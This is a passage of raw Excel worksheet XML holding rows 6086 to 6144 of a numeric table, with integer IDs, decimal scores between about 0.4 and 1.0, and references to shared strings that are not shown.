      </c>
      <c r="G6086" t="s">
        <v>12040</v>
      </c>
      <c r="H6086" t="s">
        <v>12041</v>
      </c>
    </row>
    <row r="6087" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6087" s="1">
        <v>6085</v>
      </c>
      <c r="B6087">
        <v>2573</v>
      </c>
      <c r="C6087">
        <v>2573</v>
      </c>
      <c r="D6087">
        <v>3</v>
      </c>
      <c r="E6087">
        <v>0.59700000286102295</v>
      </c>
      <c r="F6087" t="s">
        <v>10120</v>
      </c>
      <c r="G6087" t="s">
        <v>12042</v>
      </c>
      <c r="H6087" t="s">
        <v>12043</v>
      </c>
    </row>
    <row r="6088" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6088" s="1">
        <v>6086</v>
      </c>
      <c r="B6088">
        <v>2581</v>
      </c>
      <c r="C6088">
        <v>2581</v>
      </c>
      <c r="D6088">
        <v>3</v>
      </c>
      <c r="E6088">
        <v>0.42730000615119929</v>
      </c>
      <c r="F6088" t="s">
        <v>10120</v>
      </c>
      <c r="G6088" t="s">
        <v>12044</v>
      </c>
      <c r="H6088" t="s">
        <v>12045</v>
      </c>
    </row>
    <row r="6089" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6089" s="1">
        <v>6087</v>
      </c>
      <c r="B6089">
        <v>1207</v>
      </c>
      <c r="C6089">
        <v>1207</v>
      </c>
      <c r="D6089">
        <v>3</v>
      </c>
      <c r="E6089">
        <v>0.83219999074935913</v>
      </c>
      <c r="F6089" t="s">
        <v>10120</v>
      </c>
      <c r="G6089" t="s">
        <v>12046</v>
      </c>
      <c r="H6089" t="s">
        <v>12047</v>
      </c>
    </row>
    <row r="6090" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6090" s="1">
        <v>6088</v>
      </c>
      <c r="B6090">
        <v>2587</v>
      </c>
      <c r="C6090">
        <v>2587</v>
      </c>
      <c r="D6090">
        <v>3</v>
      </c>
      <c r="E6090">
        <v>0.53240001201629639</v>
      </c>
      <c r="F6090" t="s">
        <v>10120</v>
      </c>
      <c r="G6090" t="s">
        <v>12048</v>
      </c>
      <c r="H6090" t="s">
        <v>12049</v>
      </c>
    </row>
    <row r="6091" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6091" s="1">
        <v>6089</v>
      </c>
      <c r="B6091">
        <v>2588</v>
      </c>
      <c r="C6091">
        <v>2588</v>
      </c>
      <c r="D6091">
        <v>3</v>
      </c>
      <c r="E6091">
        <v>0.5877000093460083</v>
      </c>
      <c r="F6091" t="s">
        <v>10120</v>
      </c>
      <c r="G6091" t="s">
        <v>12050</v>
      </c>
      <c r="H6091" t="s">
        <v>12051</v>
      </c>
    </row>
    <row r="6092" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6092" s="1">
        <v>6090</v>
      </c>
      <c r="B6092">
        <v>1206</v>
      </c>
      <c r="C6092">
        <v>1206</v>
      </c>
      <c r="D6092">
        <v>3</v>
      </c>
      <c r="E6092">
        <v>0.56199997663497925</v>
      </c>
      <c r="F6092" t="s">
        <v>10120</v>
      </c>
      <c r="G6092" t="s">
        <v>12052</v>
      </c>
      <c r="H6092" t="s">
        <v>12053</v>
      </c>
    </row>
    <row r="6093" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6093" s="1">
        <v>6091</v>
      </c>
      <c r="B6093">
        <v>2591</v>
      </c>
      <c r="C6093">
        <v>2591</v>
      </c>
      <c r="D6093">
        <v>3</v>
      </c>
      <c r="E6093">
        <v>0.99290001392364502</v>
      </c>
      <c r="F6093" t="s">
        <v>10120</v>
      </c>
      <c r="G6093" t="s">
        <v>12054</v>
      </c>
      <c r="H6093" t="s">
        <v>12055</v>
      </c>
    </row>
    <row r="6094" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6094" s="1">
        <v>6092</v>
      </c>
      <c r="B6094">
        <v>2600</v>
      </c>
      <c r="C6094">
        <v>2600</v>
      </c>
      <c r="D6094">
        <v>3</v>
      </c>
      <c r="E6094">
        <v>0.44850000739097601</v>
      </c>
      <c r="F6094" t="s">
        <v>10120</v>
      </c>
      <c r="G6094" t="s">
        <v>12056</v>
      </c>
      <c r="H6094" t="s">
        <v>12057</v>
      </c>
    </row>
    <row r="6095" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6095" s="1">
        <v>6093</v>
      </c>
      <c r="B6095">
        <v>1203</v>
      </c>
      <c r="C6095">
        <v>1203</v>
      </c>
      <c r="D6095">
        <v>3</v>
      </c>
      <c r="E6095">
        <v>0.97020000219345093</v>
      </c>
      <c r="F6095" t="s">
        <v>10120</v>
      </c>
      <c r="G6095" t="s">
        <v>12058</v>
      </c>
      <c r="H6095" t="s">
        <v>12059</v>
      </c>
    </row>
    <row r="6096" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6096" s="1">
        <v>6094</v>
      </c>
      <c r="B6096">
        <v>2601</v>
      </c>
      <c r="C6096">
        <v>2601</v>
      </c>
      <c r="D6096">
        <v>3</v>
      </c>
      <c r="E6096">
        <v>0.65039998292922974</v>
      </c>
      <c r="F6096" t="s">
        <v>10120</v>
      </c>
      <c r="G6096" t="s">
        <v>12060</v>
      </c>
      <c r="H6096" t="s">
        <v>12061</v>
      </c>
    </row>
    <row r="6097" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6097" s="1">
        <v>6095</v>
      </c>
      <c r="B6097">
        <v>2602</v>
      </c>
      <c r="C6097">
        <v>2602</v>
      </c>
      <c r="D6097">
        <v>3</v>
      </c>
      <c r="E6097">
        <v>0.74290001392364502</v>
      </c>
      <c r="F6097" t="s">
        <v>10120</v>
      </c>
      <c r="G6097" t="s">
        <v>12062</v>
      </c>
      <c r="H6097" t="s">
        <v>12063</v>
      </c>
    </row>
    <row r="6098" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6098" s="1">
        <v>6096</v>
      </c>
      <c r="B6098">
        <v>2605</v>
      </c>
      <c r="C6098">
        <v>2605</v>
      </c>
      <c r="D6098">
        <v>3</v>
      </c>
      <c r="E6098">
        <v>0.5185999870300293</v>
      </c>
      <c r="F6098" t="s">
        <v>10120</v>
      </c>
      <c r="G6098" t="s">
        <v>12064</v>
      </c>
      <c r="H6098" t="s">
        <v>12065</v>
      </c>
    </row>
    <row r="6099" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6099" s="1">
        <v>6097</v>
      </c>
      <c r="B6099">
        <v>2610</v>
      </c>
      <c r="C6099">
        <v>2610</v>
      </c>
      <c r="D6099">
        <v>3</v>
      </c>
      <c r="E6099">
        <v>0.47179999947547913</v>
      </c>
      <c r="F6099" t="s">
        <v>10120</v>
      </c>
      <c r="G6099" t="s">
        <v>12066</v>
      </c>
      <c r="H6099" t="s">
        <v>12067</v>
      </c>
    </row>
    <row r="6100" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6100" s="1">
        <v>6098</v>
      </c>
      <c r="B6100">
        <v>1202</v>
      </c>
      <c r="C6100">
        <v>1202</v>
      </c>
      <c r="D6100">
        <v>3</v>
      </c>
      <c r="E6100">
        <v>0.56190001964569092</v>
      </c>
      <c r="F6100" t="s">
        <v>10120</v>
      </c>
      <c r="G6100" t="s">
        <v>12068</v>
      </c>
      <c r="H6100" t="s">
        <v>12069</v>
      </c>
    </row>
    <row r="6101" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6101" s="1">
        <v>6099</v>
      </c>
      <c r="B6101">
        <v>1197</v>
      </c>
      <c r="C6101">
        <v>1197</v>
      </c>
      <c r="D6101">
        <v>3</v>
      </c>
      <c r="E6101">
        <v>0.97500002384185791</v>
      </c>
      <c r="F6101" t="s">
        <v>10120</v>
      </c>
      <c r="G6101" t="s">
        <v>12070</v>
      </c>
      <c r="H6101" t="s">
        <v>12071</v>
      </c>
    </row>
    <row r="6102" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6102" s="1">
        <v>6100</v>
      </c>
      <c r="B6102">
        <v>1192</v>
      </c>
      <c r="C6102">
        <v>1192</v>
      </c>
      <c r="D6102">
        <v>3</v>
      </c>
      <c r="E6102">
        <v>0.74309998750686646</v>
      </c>
      <c r="F6102" t="s">
        <v>10120</v>
      </c>
      <c r="G6102" t="s">
        <v>12072</v>
      </c>
      <c r="H6102" t="s">
        <v>12073</v>
      </c>
    </row>
    <row r="6103" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6103" s="1">
        <v>6101</v>
      </c>
      <c r="B6103">
        <v>1190</v>
      </c>
      <c r="C6103">
        <v>1190</v>
      </c>
      <c r="D6103">
        <v>3</v>
      </c>
      <c r="E6103">
        <v>0.52300000190734863</v>
      </c>
      <c r="F6103" t="s">
        <v>10120</v>
      </c>
      <c r="G6103" t="s">
        <v>12074</v>
      </c>
      <c r="H6103" t="s">
        <v>12075</v>
      </c>
    </row>
    <row r="6104" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6104" s="1">
        <v>6102</v>
      </c>
      <c r="B6104">
        <v>2566</v>
      </c>
      <c r="C6104">
        <v>2566</v>
      </c>
      <c r="D6104">
        <v>3</v>
      </c>
      <c r="E6104">
        <v>0.95130002498626709</v>
      </c>
      <c r="F6104" t="s">
        <v>10120</v>
      </c>
      <c r="G6104" t="s">
        <v>12076</v>
      </c>
      <c r="H6104" t="s">
        <v>12077</v>
      </c>
    </row>
    <row r="6105" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6105" s="1">
        <v>6103</v>
      </c>
      <c r="B6105">
        <v>1188</v>
      </c>
      <c r="C6105">
        <v>1188</v>
      </c>
      <c r="D6105">
        <v>3</v>
      </c>
      <c r="E6105">
        <v>0.72020000219345093</v>
      </c>
      <c r="F6105" t="s">
        <v>10120</v>
      </c>
      <c r="G6105" t="s">
        <v>12078</v>
      </c>
      <c r="H6105" t="s">
        <v>12079</v>
      </c>
    </row>
    <row r="6106" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6106" s="1">
        <v>6104</v>
      </c>
      <c r="B6106">
        <v>2564</v>
      </c>
      <c r="C6106">
        <v>2564</v>
      </c>
      <c r="D6106">
        <v>3</v>
      </c>
      <c r="E6106">
        <v>0.79790002107620239</v>
      </c>
      <c r="F6106" t="s">
        <v>10120</v>
      </c>
      <c r="G6106" t="s">
        <v>12080</v>
      </c>
      <c r="H6106" t="s">
        <v>12081</v>
      </c>
    </row>
    <row r="6107" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6107" s="1">
        <v>6105</v>
      </c>
      <c r="B6107">
        <v>2559</v>
      </c>
      <c r="C6107">
        <v>2559</v>
      </c>
      <c r="D6107">
        <v>3</v>
      </c>
      <c r="E6107">
        <v>0.55299997329711914</v>
      </c>
      <c r="F6107" t="s">
        <v>10120</v>
      </c>
      <c r="G6107" t="s">
        <v>12082</v>
      </c>
      <c r="H6107" t="s">
        <v>12083</v>
      </c>
    </row>
    <row r="6108" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6108" s="1">
        <v>6106</v>
      </c>
      <c r="B6108">
        <v>2504</v>
      </c>
      <c r="C6108">
        <v>2504</v>
      </c>
      <c r="D6108">
        <v>3</v>
      </c>
      <c r="E6108">
        <v>0.45300000905990601</v>
      </c>
      <c r="F6108" t="s">
        <v>10120</v>
      </c>
      <c r="G6108" t="s">
        <v>12084</v>
      </c>
      <c r="H6108" t="s">
        <v>12085</v>
      </c>
    </row>
    <row r="6109" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6109" s="1">
        <v>6107</v>
      </c>
      <c r="B6109">
        <v>2506</v>
      </c>
      <c r="C6109">
        <v>2506</v>
      </c>
      <c r="D6109">
        <v>3</v>
      </c>
      <c r="E6109">
        <v>0.81529998779296875</v>
      </c>
      <c r="F6109" t="s">
        <v>10120</v>
      </c>
      <c r="G6109" t="s">
        <v>12086</v>
      </c>
      <c r="H6109" t="s">
        <v>12087</v>
      </c>
    </row>
    <row r="6110" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6110" s="1">
        <v>6108</v>
      </c>
      <c r="B6110">
        <v>2518</v>
      </c>
      <c r="C6110">
        <v>2518</v>
      </c>
      <c r="D6110">
        <v>3</v>
      </c>
      <c r="E6110">
        <v>0.99610000848770142</v>
      </c>
      <c r="F6110" t="s">
        <v>10120</v>
      </c>
      <c r="G6110" t="s">
        <v>12088</v>
      </c>
      <c r="H6110" t="s">
        <v>12089</v>
      </c>
    </row>
    <row r="6111" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6111" s="1">
        <v>6109</v>
      </c>
      <c r="B6111">
        <v>2526</v>
      </c>
      <c r="C6111">
        <v>2526</v>
      </c>
      <c r="D6111">
        <v>3</v>
      </c>
      <c r="E6111">
        <v>0.99510002136230469</v>
      </c>
      <c r="F6111" t="s">
        <v>10120</v>
      </c>
      <c r="G6111" t="s">
        <v>12090</v>
      </c>
      <c r="H6111" t="s">
        <v>12091</v>
      </c>
    </row>
    <row r="6112" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6112" s="1">
        <v>6110</v>
      </c>
      <c r="B6112">
        <v>2527</v>
      </c>
      <c r="C6112">
        <v>2527</v>
      </c>
      <c r="D6112">
        <v>3</v>
      </c>
      <c r="E6112">
        <v>0.89170002937316895</v>
      </c>
      <c r="F6112" t="s">
        <v>10120</v>
      </c>
      <c r="G6112" t="s">
        <v>12092</v>
      </c>
      <c r="H6112" t="s">
        <v>12093</v>
      </c>
    </row>
    <row r="6113" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6113" s="1">
        <v>6111</v>
      </c>
      <c r="B6113">
        <v>2531</v>
      </c>
      <c r="C6113">
        <v>2531</v>
      </c>
      <c r="D6113">
        <v>3</v>
      </c>
      <c r="E6113">
        <v>0.58840000629425049</v>
      </c>
      <c r="F6113" t="s">
        <v>10120</v>
      </c>
      <c r="G6113" t="s">
        <v>12094</v>
      </c>
      <c r="H6113" t="s">
        <v>12095</v>
      </c>
    </row>
    <row r="6114" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6114" s="1">
        <v>6112</v>
      </c>
      <c r="B6114">
        <v>2532</v>
      </c>
      <c r="C6114">
        <v>2532</v>
      </c>
      <c r="D6114">
        <v>3</v>
      </c>
      <c r="E6114">
        <v>0.76700001955032349</v>
      </c>
      <c r="F6114" t="s">
        <v>10120</v>
      </c>
      <c r="G6114" t="s">
        <v>12096</v>
      </c>
      <c r="H6114" t="s">
        <v>12097</v>
      </c>
    </row>
    <row r="6115" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6115" s="1">
        <v>6113</v>
      </c>
      <c r="B6115">
        <v>2533</v>
      </c>
      <c r="C6115">
        <v>2533</v>
      </c>
      <c r="D6115">
        <v>3</v>
      </c>
      <c r="E6115">
        <v>0.73930001258850098</v>
      </c>
      <c r="F6115" t="s">
        <v>10120</v>
      </c>
      <c r="G6115" t="s">
        <v>12098</v>
      </c>
      <c r="H6115" t="s">
        <v>12099</v>
      </c>
    </row>
    <row r="6116" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6116" s="1">
        <v>6114</v>
      </c>
      <c r="B6116">
        <v>2534</v>
      </c>
      <c r="C6116">
        <v>2534</v>
      </c>
      <c r="D6116">
        <v>3</v>
      </c>
      <c r="E6116">
        <v>0.84930002689361572</v>
      </c>
      <c r="F6116" t="s">
        <v>10120</v>
      </c>
      <c r="G6116" t="s">
        <v>12100</v>
      </c>
      <c r="H6116" t="s">
        <v>12101</v>
      </c>
    </row>
    <row r="6117" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6117" s="1">
        <v>6115</v>
      </c>
      <c r="B6117">
        <v>1211</v>
      </c>
      <c r="C6117">
        <v>1211</v>
      </c>
      <c r="D6117">
        <v>3</v>
      </c>
      <c r="E6117">
        <v>0.66589999198913574</v>
      </c>
      <c r="F6117" t="s">
        <v>10120</v>
      </c>
      <c r="G6117" t="s">
        <v>12102</v>
      </c>
      <c r="H6117" t="s">
        <v>12103</v>
      </c>
    </row>
    <row r="6118" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6118" s="1">
        <v>6116</v>
      </c>
      <c r="B6118">
        <v>2544</v>
      </c>
      <c r="C6118">
        <v>2544</v>
      </c>
      <c r="D6118">
        <v>3</v>
      </c>
      <c r="E6118">
        <v>0.57319998741149902</v>
      </c>
      <c r="F6118" t="s">
        <v>10120</v>
      </c>
      <c r="G6118" t="s">
        <v>12104</v>
      </c>
      <c r="H6118" t="s">
        <v>12105</v>
      </c>
    </row>
    <row r="6119" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6119" s="1">
        <v>6117</v>
      </c>
      <c r="B6119">
        <v>1210</v>
      </c>
      <c r="C6119">
        <v>1210</v>
      </c>
      <c r="D6119">
        <v>3</v>
      </c>
      <c r="E6119">
        <v>0.97860002517700195</v>
      </c>
      <c r="F6119" t="s">
        <v>10120</v>
      </c>
      <c r="G6119" t="s">
        <v>12106</v>
      </c>
      <c r="H6119" t="s">
        <v>12107</v>
      </c>
    </row>
    <row r="6120" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6120" s="1">
        <v>6118</v>
      </c>
      <c r="B6120">
        <v>2545</v>
      </c>
      <c r="C6120">
        <v>2545</v>
      </c>
      <c r="D6120">
        <v>3</v>
      </c>
      <c r="E6120">
        <v>0.49540001153945917</v>
      </c>
      <c r="F6120" t="s">
        <v>10120</v>
      </c>
      <c r="G6120" t="s">
        <v>12108</v>
      </c>
      <c r="H6120" t="s">
        <v>12109</v>
      </c>
    </row>
    <row r="6121" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6121" s="1">
        <v>6119</v>
      </c>
      <c r="B6121">
        <v>2548</v>
      </c>
      <c r="C6121">
        <v>2548</v>
      </c>
      <c r="D6121">
        <v>3</v>
      </c>
      <c r="E6121">
        <v>0.99610000848770142</v>
      </c>
      <c r="F6121" t="s">
        <v>10120</v>
      </c>
      <c r="G6121" t="s">
        <v>12110</v>
      </c>
      <c r="H6121" t="s">
        <v>12089</v>
      </c>
    </row>
    <row r="6122" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6122" s="1">
        <v>6120</v>
      </c>
      <c r="B6122">
        <v>2550</v>
      </c>
      <c r="C6122">
        <v>2550</v>
      </c>
      <c r="D6122">
        <v>3</v>
      </c>
      <c r="E6122">
        <v>0.53350001573562622</v>
      </c>
      <c r="F6122" t="s">
        <v>10120</v>
      </c>
      <c r="G6122" t="s">
        <v>12111</v>
      </c>
      <c r="H6122" t="s">
        <v>12112</v>
      </c>
    </row>
    <row r="6123" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6123" s="1">
        <v>6121</v>
      </c>
      <c r="B6123">
        <v>2552</v>
      </c>
      <c r="C6123">
        <v>2552</v>
      </c>
      <c r="D6123">
        <v>3</v>
      </c>
      <c r="E6123">
        <v>0.59600001573562622</v>
      </c>
      <c r="F6123" t="s">
        <v>10120</v>
      </c>
      <c r="G6123" t="s">
        <v>12113</v>
      </c>
      <c r="H6123" t="s">
        <v>12114</v>
      </c>
    </row>
    <row r="6124" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6124" s="1">
        <v>6122</v>
      </c>
      <c r="B6124">
        <v>2555</v>
      </c>
      <c r="C6124">
        <v>2555</v>
      </c>
      <c r="D6124">
        <v>3</v>
      </c>
      <c r="E6124">
        <v>0.9968000054359436</v>
      </c>
      <c r="F6124" t="s">
        <v>10120</v>
      </c>
      <c r="G6124" t="s">
        <v>12115</v>
      </c>
      <c r="H6124" t="s">
        <v>12116</v>
      </c>
    </row>
    <row r="6125" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6125" s="1">
        <v>6123</v>
      </c>
      <c r="B6125">
        <v>2561</v>
      </c>
      <c r="C6125">
        <v>2561</v>
      </c>
      <c r="D6125">
        <v>3</v>
      </c>
      <c r="E6125">
        <v>0.58799999952316284</v>
      </c>
      <c r="F6125" t="s">
        <v>10120</v>
      </c>
      <c r="G6125" t="s">
        <v>12117</v>
      </c>
      <c r="H6125" t="s">
        <v>12118</v>
      </c>
    </row>
    <row r="6126" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6126" s="1">
        <v>6124</v>
      </c>
      <c r="B6126">
        <v>2502</v>
      </c>
      <c r="C6126">
        <v>2502</v>
      </c>
      <c r="D6126">
        <v>3</v>
      </c>
      <c r="E6126">
        <v>0.88179999589920044</v>
      </c>
      <c r="F6126" t="s">
        <v>10120</v>
      </c>
      <c r="G6126" t="s">
        <v>12119</v>
      </c>
      <c r="H6126" t="s">
        <v>12120</v>
      </c>
    </row>
    <row r="6127" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6127" s="1">
        <v>6125</v>
      </c>
      <c r="B6127">
        <v>2635</v>
      </c>
      <c r="C6127">
        <v>2635</v>
      </c>
      <c r="D6127">
        <v>3</v>
      </c>
      <c r="E6127">
        <v>0.5382000207901001</v>
      </c>
      <c r="F6127" t="s">
        <v>10120</v>
      </c>
      <c r="G6127" t="s">
        <v>12121</v>
      </c>
      <c r="H6127" t="s">
        <v>12122</v>
      </c>
    </row>
    <row r="6128" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6128" s="1">
        <v>6126</v>
      </c>
      <c r="B6128">
        <v>1187</v>
      </c>
      <c r="C6128">
        <v>1187</v>
      </c>
      <c r="D6128">
        <v>3</v>
      </c>
      <c r="E6128">
        <v>0.79589998722076416</v>
      </c>
      <c r="F6128" t="s">
        <v>10120</v>
      </c>
      <c r="G6128" t="s">
        <v>12123</v>
      </c>
      <c r="H6128" t="s">
        <v>12124</v>
      </c>
    </row>
    <row r="6129" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6129" s="1">
        <v>6127</v>
      </c>
      <c r="B6129">
        <v>2704</v>
      </c>
      <c r="C6129">
        <v>2704</v>
      </c>
      <c r="D6129">
        <v>3</v>
      </c>
      <c r="E6129">
        <v>0.84909999370574951</v>
      </c>
      <c r="F6129" t="s">
        <v>10120</v>
      </c>
      <c r="G6129" t="s">
        <v>12125</v>
      </c>
      <c r="H6129" t="s">
        <v>12126</v>
      </c>
    </row>
    <row r="6130" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6130" s="1">
        <v>6128</v>
      </c>
      <c r="B6130">
        <v>2707</v>
      </c>
      <c r="C6130">
        <v>2707</v>
      </c>
      <c r="D6130">
        <v>3</v>
      </c>
      <c r="E6130">
        <v>0.94010001420974731</v>
      </c>
      <c r="F6130" t="s">
        <v>10120</v>
      </c>
      <c r="G6130" t="s">
        <v>12127</v>
      </c>
      <c r="H6130" t="s">
        <v>12128</v>
      </c>
    </row>
    <row r="6131" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6131" s="1">
        <v>6129</v>
      </c>
      <c r="B6131">
        <v>2709</v>
      </c>
      <c r="C6131">
        <v>2709</v>
      </c>
      <c r="D6131">
        <v>3</v>
      </c>
      <c r="E6131">
        <v>0.67409998178482056</v>
      </c>
      <c r="F6131" t="s">
        <v>10120</v>
      </c>
      <c r="G6131" t="s">
        <v>12129</v>
      </c>
      <c r="H6131" t="s">
        <v>12130</v>
      </c>
    </row>
    <row r="6132" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6132" s="1">
        <v>6130</v>
      </c>
      <c r="B6132">
        <v>2712</v>
      </c>
      <c r="C6132">
        <v>2712</v>
      </c>
      <c r="D6132">
        <v>3</v>
      </c>
      <c r="E6132">
        <v>0.74709999561309814</v>
      </c>
      <c r="F6132" t="s">
        <v>10120</v>
      </c>
      <c r="G6132" t="s">
        <v>12131</v>
      </c>
      <c r="H6132" t="s">
        <v>12132</v>
      </c>
    </row>
    <row r="6133" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6133" s="1">
        <v>6131</v>
      </c>
      <c r="B6133">
        <v>2717</v>
      </c>
      <c r="C6133">
        <v>2717</v>
      </c>
      <c r="D6133">
        <v>3</v>
      </c>
      <c r="E6133">
        <v>0.9781000018119812</v>
      </c>
      <c r="F6133" t="s">
        <v>10120</v>
      </c>
      <c r="G6133" t="s">
        <v>12133</v>
      </c>
      <c r="H6133" t="s">
        <v>12134</v>
      </c>
    </row>
    <row r="6134" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6134" s="1">
        <v>6132</v>
      </c>
      <c r="B6134">
        <v>2720</v>
      </c>
      <c r="C6134">
        <v>2720</v>
      </c>
      <c r="D6134">
        <v>3</v>
      </c>
      <c r="E6134">
        <v>0.63370001316070557</v>
      </c>
      <c r="F6134" t="s">
        <v>10120</v>
      </c>
      <c r="G6134" t="s">
        <v>12135</v>
      </c>
      <c r="H6134" t="s">
        <v>12136</v>
      </c>
    </row>
    <row r="6135" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6135" s="1">
        <v>6133</v>
      </c>
      <c r="B6135">
        <v>2721</v>
      </c>
      <c r="C6135">
        <v>2721</v>
      </c>
      <c r="D6135">
        <v>3</v>
      </c>
      <c r="E6135">
        <v>0.58609998226165771</v>
      </c>
      <c r="F6135" t="s">
        <v>10120</v>
      </c>
      <c r="G6135" t="s">
        <v>12137</v>
      </c>
      <c r="H6135" t="s">
        <v>12138</v>
      </c>
    </row>
    <row r="6136" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6136" s="1">
        <v>6134</v>
      </c>
      <c r="B6136">
        <v>2724</v>
      </c>
      <c r="C6136">
        <v>2724</v>
      </c>
      <c r="D6136">
        <v>3</v>
      </c>
      <c r="E6136">
        <v>0.47389999032020569</v>
      </c>
      <c r="F6136" t="s">
        <v>10120</v>
      </c>
      <c r="G6136" t="s">
        <v>12139</v>
      </c>
      <c r="H6136" t="s">
        <v>12140</v>
      </c>
    </row>
    <row r="6137" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6137" s="1">
        <v>6135</v>
      </c>
      <c r="B6137">
        <v>2731</v>
      </c>
      <c r="C6137">
        <v>2731</v>
      </c>
      <c r="D6137">
        <v>3</v>
      </c>
      <c r="E6137">
        <v>0.8278999924659729</v>
      </c>
      <c r="F6137" t="s">
        <v>10120</v>
      </c>
      <c r="G6137" t="s">
        <v>12141</v>
      </c>
      <c r="H6137" t="s">
        <v>12142</v>
      </c>
    </row>
    <row r="6138" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6138" s="1">
        <v>6136</v>
      </c>
      <c r="B6138">
        <v>1129</v>
      </c>
      <c r="C6138">
        <v>1129</v>
      </c>
      <c r="D6138">
        <v>3</v>
      </c>
      <c r="E6138">
        <v>0.40169999003410339</v>
      </c>
      <c r="F6138" t="s">
        <v>10120</v>
      </c>
      <c r="G6138" t="s">
        <v>12143</v>
      </c>
      <c r="H6138" t="s">
        <v>12144</v>
      </c>
    </row>
    <row r="6139" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6139" s="1">
        <v>6137</v>
      </c>
      <c r="B6139">
        <v>1123</v>
      </c>
      <c r="C6139">
        <v>1123</v>
      </c>
      <c r="D6139">
        <v>3</v>
      </c>
      <c r="E6139">
        <v>0.90319997072219849</v>
      </c>
      <c r="F6139" t="s">
        <v>10120</v>
      </c>
      <c r="G6139" t="s">
        <v>12145</v>
      </c>
      <c r="H6139" t="s">
        <v>12146</v>
      </c>
    </row>
    <row r="6140" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6140" s="1">
        <v>6138</v>
      </c>
      <c r="B6140">
        <v>1121</v>
      </c>
      <c r="C6140">
        <v>1121</v>
      </c>
      <c r="D6140">
        <v>3</v>
      </c>
      <c r="E6140">
        <v>0.40920001268386841</v>
      </c>
      <c r="F6140" t="s">
        <v>10120</v>
      </c>
      <c r="G6140" t="s">
        <v>12147</v>
      </c>
      <c r="H6140" t="s">
        <v>12148</v>
      </c>
    </row>
    <row r="6141" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6141" s="1">
        <v>6139</v>
      </c>
      <c r="B6141">
        <v>1117</v>
      </c>
      <c r="C6141">
        <v>1117</v>
      </c>
      <c r="D6141">
        <v>3</v>
      </c>
      <c r="E6141">
        <v>0.60570001602172852</v>
      </c>
      <c r="F6141" t="s">
        <v>10120</v>
      </c>
      <c r="G6141" t="s">
        <v>12149</v>
      </c>
      <c r="H6141" t="s">
        <v>12150</v>
      </c>
    </row>
    <row r="6142" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6142" s="1">
        <v>6140</v>
      </c>
      <c r="B6142">
        <v>2752</v>
      </c>
      <c r="C6142">
        <v>2752</v>
      </c>
      <c r="D6142">
        <v>3</v>
      </c>
      <c r="E6142">
        <v>0.66579997539520264</v>
      </c>
      <c r="F6142" t="s">
        <v>10120</v>
      </c>
      <c r="G6142" t="s">
        <v>12151</v>
      </c>
      <c r="H6142" t="s">
        <v>12152</v>
      </c>
    </row>
    <row r="6143" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6143" s="1">
        <v>6141</v>
      </c>
      <c r="B6143">
        <v>2753</v>
      </c>
      <c r="C6143">
        <v>2753</v>
      </c>
      <c r="D6143">
        <v>3</v>
      </c>
      <c r="E6143">
        <v>0.67030000686645508</v>
      </c>
      <c r="F6143" t="s">
        <v>10120</v>
      </c>
      <c r="G6143" t="s">
        <v>12153</v>
      </c>
      <c r="H6143" t="s">
        <v>12154</v>
      </c>
    </row>
    <row r="6144" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6144" s="1">
        <v>6142</v>
      </c>
      <c r="B6144">
        <v>2758</v>
      </c>
      <c r="C6144">
        <v>2758</v>
      </c>
      <c r="D6144">
        <v>3</v>
      </c>
      <c r="E6144">
        <v>0.60909998416900635</v>
      </c>
      <c r="F6144" t="s">
        <v>10120</v>
      </c>
      <c r="G6144" t="s">
        <v>12155</v>
      </c>
      <c r="H6144" t="s">
        <v>12156</v>
      </c>
    </row>
